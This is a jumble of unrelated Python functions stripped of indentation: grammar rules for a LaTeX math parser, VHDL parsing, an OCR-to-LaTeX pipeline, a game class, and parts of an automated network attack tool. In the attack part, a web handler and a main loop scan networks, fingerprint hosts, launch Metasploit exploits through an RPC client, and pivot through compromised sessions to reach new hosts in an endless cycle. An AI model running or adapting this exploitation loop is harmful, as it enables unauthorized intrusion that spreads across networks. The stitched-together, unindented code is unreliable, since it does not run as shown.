def p_DifferentialVariable2(t):
'''DifferentialVariable : ID CARET LBRACE LPAREN NUMBER RPAREN RBRACE LPAREN ExpressionList RPAREN
| ID CARET LBRACE LPAREN NUMBER RPAREN RBRACE'''
isOrder = False
try:
order = int(t[5].getNumber())
isOrder = True
except Exception as msg:
order = t[5]
if isOrder:
if order > 0:
primeList = [Symbol(Symbol.PRIME)]*int(order)
else:
primeList = []
if len(t) > 8:
t[0] = DifferentialVariable(Identifier(ID(t[1])), primeList, t[9])
else:
t[0] = DifferentialVariable(Identifier(ID(t[1])), primeList)
else:
if len(t) > 8:
raise SyntaxException(t.slice[5].lineno, t.slice[5].lexpos, t.slice[5].value, t.slice[5])
else:
t[0] = ExpressionWithBinaryOperation(BinaryOperator(BinaryOperator.POW), Identifier(ID(t[1])), t[5])
def p_LIMIT(t):
'''Limit : LIMIT UNDERLINE LBRACE ID TO Expression RBRACE Expression
| LIMIT UNDERLINE LBRACE ID TO Expression PLUS RBRACE Expression
| LIMIT UNDERLINE LBRACE ID TO Expression MINUS RBRACE Expression
| LIMIT UNDERLINE LBRACE ID TO Expression CARET LBRACE PLUS RBRACE RBRACE Expression
| LIMIT UNDERLINE LBRACE ID TO Expression CARET LBRACE MINUS RBRACE RBRACE Expression
| LIMIT UNDERLINE LBRACE ID TO Term CARET LBRACE PLUS RBRACE RBRACE Expression
| LIMIT UNDERLINE LBRACE ID TO Term CARET LBRACE MINUS RBRACE RBRACE Expression'''
if len(t) > 10:
if t.slice[9].type == "PLUS":
approachesFrom = Limit.FROM_RIGHT
else:
approachesFrom = Limit.FROM_LEFT
t[0] = Limit(Identifier(ID(t[4])), t[6], t[12], approachesFrom)
elif len(t) > 9:
if t.slice[7].type == "PLUS":
approachesFrom = Limit.FROM_RIGHT
else:
approachesFrom = Limit.FROM_LEFT
t[0] = Limit(Identifier(ID(t[4])), t[6], t[9], approachesFrom)
else:
t[0] = Limit(Identifier(ID(t[4])), t[6], t[8])
def p_Factor(t):
'''Factor : NUMBER
| ImaginaryNumber
| NapierNumber
| ID
| INFINITY
| Symbol
| IteratedExpression
| DivisorFunction
| Derivative
| Integral
| Limit
| DifferentialVariable
| ChooseExpression
| Matrix
| Determinant
| Norm
| FractionalExpression
| ID CARET LBRACE Expression RBRACE
| LPAREN Expression RPAREN'''
if len(t) > 4:
t[1] = Identifier(ID(t[1]))
t[0] = ExpressionWithBinaryOperation(BinaryOperator(BinaryOperator.POW), t[1], t[4])
elif len(t) > 2:
t[0] = ExpressionBetweenParenthesis(t[2])
else:
if t.slice[1].type == "ID":
t[1] = Identifier(ID(t[1]))
t[0] = t[1]
def p_DifferentialVariable1(t):
'''DifferentialVariable : ID PrimeList LPAREN ExpressionList RPAREN
| ID PrimeList'''
if len(t) > 3:
t[0] = DifferentialVariable(Identifier(ID(t[1])), t[2], t[4])
else:
t[0] = DifferentialVariable(Identifier(ID(t[1])), t[2])
def p_UnaryExpressionOperatorAfter(t):
'''Factor : NUMBER FACTORIAL
| ID FACTORIAL
| LPAREN Expression RPAREN FACTORIAL
| NUMBER PERCENT
| ID PERCENT
| LPAREN Expression RPAREN PERCENT'''
if t.slice[1].type == "ID":
t[1] = Identifier(ID(t[1]))
if len(t) > 3:
if t.slice[4].type == "FACTORIAL":
op = UnaryOperator.FACTORIAL
else:
op = UnaryOperator.PERCENT
t[0] = ExpressionWithUnaryOperation(UnaryOperator(op), ExpressionBetweenParenthesis(t[2]), True)
else:
if t.slice[2].type == "FACTORIAL":
op = UnaryOperator.FACTORIAL
else:
op = UnaryOperator.PERCENT
t[0] = ExpressionWithUnaryOperation(UnaryOperator(op), t[1], True)
def parse_port(next, infile, entity):
'''parse the port and return a 'port' object
'''
names = []
while 1:
cont = compareIdentifiers(next, Identifier(" "), infile)
names.append(next.name)
if not isinstance(cont, Token) or cont.name != ",":
break
else:
next = nextToken(infile)
valueOne = compareTokens(cont, Token(":"), infile)
(valueTwo, flow) = parse_flow(valueOne, infile)
(valueThree, type, length) = parse_datatype(valueTwo, infile)
# store derived port information into Entity
for i in names:
if flow == "in":
entity.IN.append(Port.Port(i, Port.IN, type, length))
elif flow == "out":
entity.OUT.append(Port.Port(i, Port.OUT, type, length))
else:
entity.INOUT.append(Port.Port(i, Port.INOUT, type, length))
# recurse if there are more ports defined
if isinstance (valueThree, Token) and valueThree.name == ";":
return parse_port(nextToken(infile), infile, entity)
else:
return (valueThree, entity)
def isKeyword(infile, value):
'''isKeyword: identifies token as keyword or symbol
infile: object file
value: string to identify
return: keyword or identifier
'''
infile.seek(infile.tell() - 1)
if value in keywords: #string is a keyword
return Keyword(value)
else: #string is an identifier
return Identifier(value)
def parse_entity(current, infile):
'''Parse the entity'''
value1 = compareKeywords(current, Keyword("entity"), infile)
value2 = compareIdentifiers(value1, Identifier(" "), infile)
# create entity object
entity = Entity(value1.name, [])
value3 = compareKeywords(value2, Keyword("is"), infile)
(value4, rtn) = parse_entitytype(value3, infile, entity)
value5 = compareTokens(value4, Token(";"), infile)
value6 = compareKeywords(value5, Keyword("end"), infile)
value7 = compareIdentifiers(value6, Identifier(" "), infile)
# identifier names must match
if value6.name != value1.name:
printError(value6, value1)
value8 = compareTokens(value7, Token(";"), infile)
# return Entity object
return (value8, entity)
def ocr(self, img, chars):
#print(chars)
#print(len(chars))
chars = Identifier.Identifier().identifyMath(img, chars)
for i in range(0, len(chars)):
c = chars[i][-1] #chr(int(chars[i][-1][2:], 16))
if (c == '−' or c == '-' or c == '—') and \
(i != 0 and chars[i][0][0] == chars[i-1][0][0] and chars[i][0][1] != chars[i-1][0][1]) and \
(i != len(chars) - 1 and chars[i][0][0] == chars[i+1][0][0] and chars[i][0][1] != chars[i+1][0][1]):
c = '/'
if c == '√':
c = '√('
chars[i][-1] = c
return chars
def parse_architecture(current, infile):
'''Parse the archtecture component.'''
value1 = compareKeywords(current, Keyword("architecture"), infile)
value2 = compareKeywords(value1, Keyword("dataflow"), infile)
value3 = compareKeywords(value2, Keyword("of"), infile)
value4 = compareIdentifiers(value3, Identifier(" "), infile)
archi = Architecture(value3.name)
value5 = compareKeywords(value4, Keyword("is"), infile)
value6 = compareKeywords(value5, Keyword("begin"), infile)
value7 = compareKeywords(value6, Keyword("end"), infile)
value8 = compareKeywords(value7, Keyword("dataflow"), infile)
value9 = compareTokens(value8, Token(";"), infile)
return (value9, archi)
def p_IteratedExpression(t):
'''IteratedExpression : SUM UNDERLINE LBRACE IndexingExpression RBRACE Expression
| SUM UNDERLINE LBRACE ID EQ Expression RBRACE CARET LBRACE Expression RBRACE Expression
| PROD UNDERLINE LBRACE IndexingExpression RBRACE Expression
| PROD UNDERLINE LBRACE ID EQ Expression RBRACE CARET LBRACE Expression RBRACE Expression'''
_type = t.slice[1].type
if _type == "SUM":
op = IteratedOperator(IteratedOperator.SUM)
else:
op = IteratedOperator(IteratedOperator.PROD)
if len(t) > 7:
_range = Range(t[6], t[10])
indexingExpression = IndexingExpression(Identifier(ID(t[4])), _range)
t[0] = IteratedExpression(op, t[12], indexingExpression)
else:
t[0] = IteratedExpression(op, t[6], t[4])
def todo():
todo = request.args.get('do')
host = request.args.get('host')
target = request.args.get('target')
exploit = request.args.get('exploit')
if todo == 'Identifier':
identifyResults = Identifier.scanCurrentNetwork()
identifyDict = json.loads(identifyResults)
Net_map.insert(identifyDict)
return identifyResults
elif todo == 'Enricher' and host != '':
enrichResults = Enricher.scanHostForInfo(host)
return str(enrichResults)
elif todo == 'Exploiter' and target != '' and exploit != '':
msClient = MsfRpcClient("pass")
exploitResults = Exploiter.callExploit(msClient, exploit, target)
return str(exploitResults)
else:
return 'Error: input incorrect'
def p_FunctionExpression(t):
'''Factor : SQRT LBRACE Expression RBRACE
| SQRT LBRACKET NUMBER RBRACKET LBRACE Expression RBRACE
| LFLOOR Expression RFLOOR
| LCEIL Expression RCEIL
| PIPE Expression PIPE
| ASINH LPAREN Expression RPAREN
| ASINH ID
| ASINH NUMBER
| SINH LPAREN Expression RPAREN
| SINH ID
| SINH NUMBER
| ASIN LPAREN Expression RPAREN
| ASIN ID
| ASIN NUMBER
| SIN LPAREN Expression RPAREN
| SIN ID
| SIN NUMBER
| ACOSH LPAREN Expression RPAREN
| ACOSH ID
| ACOSH NUMBER
| COSH LPAREN Expression RPAREN
| COSH ID
| COSH NUMBER
| ACOS LPAREN Expression RPAREN
| ACOS ID
| ACOS NUMBER
| COS LPAREN Expression RPAREN
| COS ID
| COS NUMBER
| ATANH LPAREN Expression RPAREN
| ATANH ID
| ATANH NUMBER
| TANH LPAREN Expression RPAREN
| TANH ID
| TANH NUMBER
| ATAN LPAREN Expression COMMA Expression RPAREN
| ATAN LPAREN Expression RPAREN
| ATAN ID
| ATAN NUMBER
| TAN LPAREN Expression RPAREN
| TAN ID
| TAN NUMBER
| ASEC LPAREN Expression RPAREN
| ASEC ID
| ASEC NUMBER
| SEC LPAREN Expression RPAREN
| SEC ID
| SEC NUMBER
| ACSC LPAREN Expression RPAREN
| ACSC ID
| ACSC NUMBER
| CSC LPAREN Expression RPAREN
| CSC ID
| CSC NUMBER
| ACOTH LPAREN Expression RPAREN
| ACOTH ID
| ACOTH NUMBER
| COTH LPAREN Expression RPAREN
| COTH ID
| COTH NUMBER
| ACOT LPAREN Expression RPAREN
| ACOT ID
| ACOT NUMBER
| COT LPAREN Expression RPAREN
| COT ID
| COT NUMBER
| LOG LPAREN Expression RPAREN
| LOG ID
| LOG NUMBER
| LOG UNDERLINE LBRACE NUMBER RBRACE LPAREN Expression RPAREN
| LN LPAREN Expression RPAREN
| LN ID
| LN NUMBER
| EXP LPAREN Expression RPAREN
| EXP ID
| EXP NUMBER
| GCD LPAREN ExpressionList RPAREN
| GCD ID
| GCD NUMBER
| DEG LPAREN ExpressionList RPAREN
| DEG ID
| DEG NUMBER
| GRADIENT LPAREN ExpressionList RPAREN
| GRADIENT ID
| GRADIENT NUMBER
| GRADIENT DOT LPAREN ExpressionList RPAREN
| GRADIENT DOT ID
| GRADIENT DOT NUMBER
| GRADIENT CROSS LPAREN ExpressionList RPAREN
| GRADIENT CROSS ID
| GRADIENT CROSS NUMBER
| LAPLACIAN LPAREN Expression RPAREN
| LAPLACIAN NUMBER
| LAPLACIAN ID
| DETERMINANT LPAREN Matrix RPAREN
| DETERMINANT Matrix
| Symbol LPAREN ExpressionList RPAREN
| ID LPAREN ExpressionList RPAREN
| ID LPAREN RPAREN'''
_type = t.slice[1].type
if _type == "Symbol":
function = t[1]
elif _type == "SQRT":
function = FunctionName(FunctionName.SQRT)
elif _type == "LFLOOR":
function = FunctionName(FunctionName.FLOOR)
elif _type == "LCEIL":
function = FunctionName(FunctionName.CEIL)
elif _type == "PIPE":
function = FunctionName(FunctionName.ABS)
elif _type == "ASINH":
function = FunctionName(FunctionName.ASINH)
elif _type == "SINH":
function = FunctionName(FunctionName.SINH)
elif _type == "ASIN":
function = FunctionName(FunctionName.ASIN)
elif _type == "SIN":
function = FunctionName(FunctionName.SIN)
elif _type == "ACOSH":
function = FunctionName(FunctionName.ACOSH)
elif _type == "COSH":
function = FunctionName(FunctionName.COSH)
elif _type == "ACOS":
function = FunctionName(FunctionName.ACOS)
elif _type == "COS":
function = FunctionName(FunctionName.COS)
elif _type == "ATANH":
function = FunctionName(FunctionName.ATANH)
elif _type == "TANH":
function = FunctionName(FunctionName.TANH)
elif _type == "ATAN":
function = FunctionName(FunctionName.ATAN)
elif _type == "TAN":
function = FunctionName(FunctionName.TAN)
elif _type == "ASEC":
function = FunctionName(FunctionName.ASEC)
elif _type == "SEC":
function = FunctionName(FunctionName.SEC)
elif _type == "ACSC":
function = FunctionName(FunctionName.ACSC)
elif _type == "CSC":
function = FunctionName(FunctionName.CSC)
elif _type == "ACOTH":
function = FunctionName(FunctionName.ACOTH)
elif _type == "COTH":
function = FunctionName(FunctionName.COTH)
elif _type == "ACOT":
function = FunctionName(FunctionName.ACOT)
elif _type == "COT":
function = FunctionName(FunctionName.COT)
elif _type == "LOG":
function = FunctionName(FunctionName.LOG)
elif _type == "LN":
function = FunctionName(FunctionName.LN)
elif _type == "EXP":
function = FunctionName(FunctionName.EXP)
elif _type == "GCD":
function = FunctionName(FunctionName.GCD)
elif _type == "DEG":
function = FunctionName(FunctionName.DEG)
elif _type == "GRADIENT":
if t.slice[2].type == "DOT":
function = FunctionName(FunctionName.DIV)
elif t.slice[2].type == "CROSS":
function = FunctionName(FunctionName.CURL)
else:
function = FunctionName(FunctionName.GRAD)
elif _type == "LAPLACIAN":
function = FunctionName(FunctionName.LAPL)
elif _type == "DETERMINANT":
function = FunctionName(FunctionName.DET)
else:
function = FunctionName(Identifier(ID(t[1])))
if len(t) > 5:
if _type == "GRADIENT":
t[0] = ExpressionWithFunction(function, t[4])
elif _type == "LOG":
t[0] = ExpressionWithFunction(function, t[7], t[4])
elif _type == "SQRT":
t[0] = ExpressionWithFunction(function, t[6], t[3])
else:
t[0] = ExpressionWithFunction(function, t[3], t[5])
elif len(t) > 4:
t[0] = ExpressionWithFunction(function, t[3])
else:
if _type == "GRADIENT":
if t.slice[3].type == "ID":
t[3] = Identifier(ID(t[3]))
t[0] = ExpressionWithFunction(function, t[3])
elif t.slice[2].type == "LPAREN":
t[0] = ExpressionWithFunction(function)
else:
if t.slice[2].type == "ID":
t[2] = Identifier(ID(t[2]))
t[0] = ExpressionWithFunction(function, t[2])
def __init__(self):
self.identifier = Identifier.ID(0)
self.home_planet = None # Special planet
self.universe_configuration = None
self.produce = Produce.Produce()
self.score = 10000
def run(self):
self.status.append("Recogniser")
recogniser = Recogniser.Recogniser()
image, img, lines, words, characters = recogniser.recognise(
self.image_loc)
self.status.append("Identifier")
identifier = Identifier.Identifier()
characters = identifier.identify(image, characters)
for i in range(0, len(words)):
string = ''
for j in range(words[i][4], words[i][5] + 1):
string += characters[j][4]
words[i].append(string)
self.status.append("Classifier")
words = Classifier.Classifier().classify(lines, words, characters)
for i in range(0, len(words)):
if type(words[i][-1]) is str:
if words[i][-2].find('æ') != -1:
index = words[i][-2].find('æ')
words[i][-2] = words[i][-2][0:index] + 'ae' + words[i][-2][
index + 1:]
if words[i][-2].find('œ') != -1:
index = words[i][-2].find('œ')
words[i][-2] = words[i][-2][0:index] + 'oe' + words[i][-2][
index + 1:]
if words[i][-2].find('ff') != -1:
index = words[i][-2].find('ff')
words[i][-2] = words[i][-2][0:index] + 'ff' + words[i][-2][
index + 1:]
if words[i][-2].find('fi') != -1:
index = words[i][-2].find('fi')
words[i][-2] = words[i][-2][0:index] + 'fi' + words[i][-2][
index + 1:]
if words[i][-2].find('fl') != -1:
index = words[i][-2].find('fl')
words[i][-2] = words[i][-2][0:index] + 'fl' + words[i][-2][
index + 1:]
if words[i][-2].find('ffi') != -1:
index = words[i][-2].find('ffi')
words[i][-2] = words[i][-2][0:index] + 'ffi' + words[i][
-2][index + 1:]
if words[i][-2].find('ffl') != -1:
index = words[i][-2].find('ffl')
words[i][-2] = words[i][-2][0:index] + 'ffl' + words[i][
-2][index + 1:]
if words[i][-2].find('ſt') != -1:
index = words[i][-2].find('ſt')
words[i][-2] = words[i][-2][0:index] + 'ft' + words[i][-2][
index + 1:]
'''
for w in words:
if w[-1] == 'text':
cv2.rectangle(img, (w[0], w[1]), (w[2], w[3]), (0, 0, 255), 3)
else:
cv2.rectangle(img, (w[0], w[1]), (w[2], w[3]), (0, 255, 0), 3)
cv2.imwrite('a8.png', img)
'''
self.status.append('Spell Corrector')
words = Corrector.Corrector().correct(words)
self.status.append('Equation Recognizer')
indx = 0
for w in words:
if w[-1] == 'math':
left, top, right, bottom = w[0], w[1], w[2], w[3]
top -= 10
bottom += 10
tmp = image[top:bottom + 1, left:right + 1]
H, W = tmp.shape
top = np.zeros((10, W), dtype='uint8')
bottom = np.zeros((10, W), dtype='uint8')
tmp = np.vstack((np.vstack((top, tmp)), bottom))
H = tmp.shape[0]
left = np.zeros((H, 10), dtype='uint8')
right = np.zeros((H, 10), dtype='uint8')
tmp = np.hstack((left, np.hstack((tmp, right))))
indx += 1
w[-2] = EqnRec.EqnRec().eqnRec(tmp, tmp)
self.status.append('Generating Output')
for i in range(0, len(words)):
if words[i][-1] is not None:
if words[i][-2].find('æ') != -1:
index = words[i][-2].find('æ')
words[i][-2] = words[i][-2][0:index] + 'ae' + words[i][-2][
index + 1:]
if words[i][-2].find('œ') != -1:
index = words[i][-2].find('œ')
words[i][-2] = words[i][-2][0:index] + 'oe' + words[i][-2][
index + 1:]
if words[i][-2].find('ff') != -1:
index = words[i][-2].find('ff')
words[i][-2] = words[i][-2][0:index] + 'ff' + words[i][-2][
index + 1:]
if words[i][-2].find('fi') != -1:
index = words[i][-2].find('fi')
words[i][-2] = words[i][-2][0:index] + 'fi' + words[i][-2][
index + 1:]
if words[i][-2].find('fl') != -1:
index = words[i][-2].find('fl')
words[i][-2] = words[i][-2][0:index] + 'fl' + words[i][-2][
index + 1:]
if words[i][-2].find('ffi') != -1:
index = words[i][-2].find('ffi')
words[i][-2] = words[i][-2][0:index] + 'ffi' + words[i][
-2][index + 1:]
if words[i][-2].find('ffl') != -1:
index = words[i][-2].find('ffl')
words[i][-2] = words[i][-2][0:index] + 'ffl' + words[i][
-2][index + 1:]
if words[i][-2].find('ſt') != -1:
index = words[i][-2].find('ſt')
words[i][-2] = words[i][-2][0:index] + 'ft' + words[i][-2][
index + 1:]
for l in lines:
count = sum(
[words[i][-1] == 'math' for i in range(l[3], l[4] + 1)])
if count == l[4] - l[3] + 1:
for i in range(l[3], l[4] + 1):
words[i][-1] = 'mathDisplay'
else:
for i in range(l[3], l[4] + 1):
if words[i][-1] == 'math':
words[i][-1] = 'mathInline'
try:
doc = Document()
textString = ""
mathString = ""
count = 0
lengthOfArray = len(words)
while count < lengthOfArray:
while count < lengthOfArray and (words[count][-1] == 'text'
or words[count][-1]
== 'mathInline'):
if words[count][-1] == 'mathInline':
textString += '$' + words[count][-2] + '$' + ' '
else:
textString += words[count][-2] + ' '
count += 1
doc.append(textString)
textString = ""
while count < lengthOfArray and words[count][
-1] == 'mathDisplay':
mathString += words[count][-2] + ' '
count += 1
doc.append(Math(data=mathString, escape=False))
mathString = ""
if sys.platform.startswith('win'):
imageNameStartIndex = self.image_loc.rfind('\\')
elif sys.platform.startswith('linux'):
imageNameStartIndex = self.image_loc.rfind('/')
imageNameEndIndex = self.image_loc.rfind('.')
doc.generate_pdf(self.save_loc + self.image_loc[imageNameStartIndex:imageNameEndIndex],\
clean_tex=False,compiler='pdflatex')
except:
pass
try:
call(['C:/Program Files (x86)/latex2rtf/latex2rt.exe', \
self.save_loc + self.image_loc[imageNameStartIndex:imageNameEndIndex] + '.tex'])
except:
pass
self.status.append("Output Generated")
print('\n')
def main():
### setup
# initialize structures for orchestration
# connect to database
# connect to msf rpc
# initialize exploits + data for selector
# initialize logging
dbClient = MongoClient()
dbRef = dbClient["NetSprawl"]
netMapTable = dbRef["Map"]
exploitTable = dbRef["Exploits"]
msfClient = MsfRpcClient("pass")
hostCollection = []
rootHost = None
enrichQueue = []
exploitQueue = []
postexQueue = []
processingCounter = 0
strategy = Selector.defaultStrategy(Exploiter.getExploitNames())
logger = logging.getLogger("Ophio")
logger.setLevel(logging.INFO)
fh = logging.FileHandler("ophio.log")
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
logger.addHandler(fh)
logger.addHandler(ch)
logger.info("Starting a new scan. Time: {}".format(time.time()))
# main loop
while True:
### identifier
# call scanCurrentNetwork on initial host
# log results of scan
# identify root node
# add host records to database
if len(enrichQueue
) == 0: # can skip if prev cycle has identified new hosts
logger.info("Identifying...")
identifyResults = json.loads(Identifier.scanCurrentNetwork())
rootInterfaces = []
hostsDiscovered = []
for result in identifyResults:
rootInterfaces.append(result["network"])
for hostIp in result["hosts"]:
hostsDiscovered.append(hostIp)
if rootHost == None:
rootIps = [
interface.split("/")[0] for interface in rootInterfaces
] # remove CIDR notation
logger.info("Root host set to IP(s) {}".format(rootIps))
rootHost = Record(rootIps, None)
rootHost.exploitStatus["statusCode"] = Record.STATUS_SUCCESS
rootHost.exploitStatus["exploitUsed"] = "N/A"
record = rootHost.toDict()
netMapTable.insert(record)
rootHost.id = record["_id"]
hostCollection.append(rootHost)
enrichQueue.append(rootHost)
for hostIp in hostsDiscovered:
uniqueIp = True
for record in hostCollection:
if hostIp in record.interfaces:
uniqueIp = False
if uniqueIp:
logger.info("New host discovered at IP {}".format(hostIp))
hostRecord = Record([hostIp], rootHost.id)
record = hostRecord.toDict()
netMapTable.insert(record)
hostRecord.id = record["_id"]
hostCollection.append(hostRecord)
enrichQueue.append(hostRecord)
### enricher
# call scanHostsForInfo on list of hosts, excluding self
# log results of scans
# append information to host records in database
if len(enrichQueue) > 0:
logger.info("Enriching...")
while len(enrichQueue) > 0:
hostRecord = enrichQueue.pop(0)
processingCounter += 1
logger.info("Scanning host at IP {}".format(hostRecord.interfaces))
enrichResults = json.loads(
Enricher.scanHostsForInfo(hostRecord.interfaces)[0])
# TODO concatenate results if there are multiple interfaces on a host
hostRecord.os = enrichResults[0]
hostRecord.openPorts = enrichResults[1:] if len(
enrichResults) > 1 else []
netMapTable.update({'_id': hostRecord.id}, {
'$set': {
'os': hostRecord.os,
'openPorts': hostRecord.openPorts
}
})
exploitQueue.append(hostRecord)
### selector/exploiter
# call search on enriched host data
# attempt exploits in recommended order
# log results and update selector after each exploit run
# append exploit status (exploit used, MS session) to host records
if len(exploitQueue) > 0:
logger.info("Exploiting...")
while len(exploitQueue) > 0:
hostRecord = exploitQueue.pop(0)
processingCounter += 1
logger.info("Profiling host at IP {}".format(
hostRecord.interfaces))
localIp = rootHost.interfaces[0]
targetIp = hostRecord.interfaces[0]
hostData = copy.copy(hostRecord.openPorts)
hostData.insert(0, hostRecord.os)
exploitOrder = strategy.search(hostData)
logger.debug("Recommended ordering: {}".format(exploitOrder))
for exploit in exploitOrder:
logger.info(
"Attempting exploit {} against host".format(exploit))
try:
exploitResults = Exploiter.callExploit(
msfClient, exploit, targetIp, localIp)
time.sleep(1) # takes time to populate session list
msfSession = Exploiter.getSessionbyExploitUUID(
msfClient, exploitResults["uuid"])
exploitSuccess = msfSession != None
except Exception as e:
logger.info("Exploit {} failed abnormally - {}".format(
exploit, e))
# traceback.print_exc()
exploitSuccess = False
strategy.update(hostData, exploit, exploitSuccess)
if exploitSuccess:
break
if not exploitSuccess:
logger.info("Failed to exploit host at IP {}".format(targetIp))
hostRecord.exploitStatus["statusCode"] = Record.STATUS_FAILURE
else:
logger.info(
"Successfully exploited host at IP {}".format(targetIp))
hostRecord.exploitStatus = {
"statusCode": Record.STATUS_SUCCESS,
"exploitUsed": exploit,
"msfSession": msfSession
}
postexQueue.append(hostRecord)
netMapTable.update(
{'_id': hostRecord.id},
{'$set': {
"exploitStatus": hostRecord.exploitStatus
}})
### post-exploits
# identify new networks from exploited hosts
# add new hosts to records + database
if len(postexQueue) > 0:
logger.info("Postexploiting...")
while len(postexQueue) > 0:
hostRecord = postexQueue.pop(0)
processingCounter += 1
session = hostRecord.exploitStatus["msfSession"]
# list interfaces from exploited host
err, interfaces = Exploiter.callPostExploit(
msfClient, "remote_host_netinfo", session)
if err == 1:
logger.info("Unable to retrieve net info from {}".format(
hostRecord.interfaces))
continue
# check for newly discovered interfaces
if len(interfaces) > len(hostRecord.interfaces):
logger.info("Additional interface(s) identified for {}".format(
interfaces))
hostRecord.interfaces = interfaces
netMapTable.update(
{'_id': hostRecord.id},
{'$set': {
"interfaces": hostRecord.interfaces
}})
# reconfigure routing to pass through
err = Exploiter.callPostExploit(msfClient,
"alter_network_routes",
session)
if err == 0:
logger.info("Modified routing for {}".format(
hostRecord.interfaces))
else:
logger.info("Unable to modify routing for {}".format(
hostRecord.interfaces))
# scan from updated host
# might make sense to have an identify queue, and move this task there
logger.info("Beginning IP scan from {}".format(
hostRecord.interfaces))
err, ipsFound = Exploiter.callPostExploit(
msfClient, "remote_host_scan", session)
if err == 1:
logger.info("Unable to complete scan from {}".format(
hostRecord.interfaces))
else:
# for each unique ip: create a new host record, add to collection, db, and enrichQueue
newIps = []
for hostIp in ipsFound:
uniqueIp = True
for record in hostCollection:
if hostIp in record.interfaces:
uniqueIp = False
if uniqueIp:
newIps.append(hostIp)
logger.info("New hosts discovered at IPs ".format(newIps))
for newIp in newIps:
newRecord = Record([newIp], hostRecord.id)
record = newRecord.toDict()
netMapTable.insert(record)
newRecord.id = record["_id"]
hostCollection.append(newRecord)
enrichQueue.append(newRecord)
else:
logger.info("No new information gained from {}".format(
hostRecord.interfaces))
### end of cycle
# identifiers should be rerun periodically to identify new hosts
# alternative: run once, and restore state from DB info on startup
logger.info("Reached end of cycle.")
# generate report iff new information
if processingCounter > 0:
# generate stats
hostsExploited = 0
timestamp = time.time()
for hostRecord in hostCollection:
if hostRecord.exploitStatus[
"statusCode"] == Record.STATUS_SUCCESS:
hostsExploited += 1
# save exploiter weights to database
strategyWeights = strategy.export()
exploitTable.insert(strategyWeights)
# save a report to file
report = {
"timestamp": timestamp,
"records_processed": processingCounter,
"root_ip": rootHost.interfaces,
"hosts_found": len(hostCollection),
"hosts_exploited": hostsExploited,
"host_collection":
[record.toCompat() for record in hostCollection],
"strategy_weights_id": str(strategyWeights["_id"])
}
with open("Reports/Report_{}.json".format(timestamp),
"w") as reportFile:
reportFile.write(json.dumps(report))
# reset counter for next cycle
processingCounter = 0
# sleep if no immediate work
if len(enrichQueue) == 0:
logger.info("Nothing new to scan. Sleeping.")
time.sleep(60)
def p_IndexingExpression(t):
'''IndexingExpression : ID IN Range'''
t[0] = IndexingExpression(Identifier(ID(t[1])), t[3])